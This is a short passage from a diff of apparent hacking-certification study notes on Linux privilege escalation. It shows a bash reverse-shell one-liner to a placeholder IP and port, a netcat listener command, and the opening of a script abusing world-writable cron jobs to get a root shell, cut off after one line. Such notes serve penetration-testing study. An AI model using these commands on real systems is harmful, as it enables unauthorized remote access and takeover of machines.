floyddc/Hacking-Cert-Prep/notes/2-Sensitive files.md

   bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
   ```
   - Then `nc -lvnp <PORT>` on your own Terminal to start a NetCat reverse shell.<br><br>
-  - If one of these **cron jobs are world-writable and searched in `/home/user` path** and **you're not root**, it's possible to modify and exploit them to gain a root shell in this way:
+  - If one of these **cron jobs are world-writable and searched in `/home/user` path** and **you're not root**, it's possible to modify and exploit them to get a root shell in this way:
   ```
   #!/bin/bash
   mkdir /tmpdir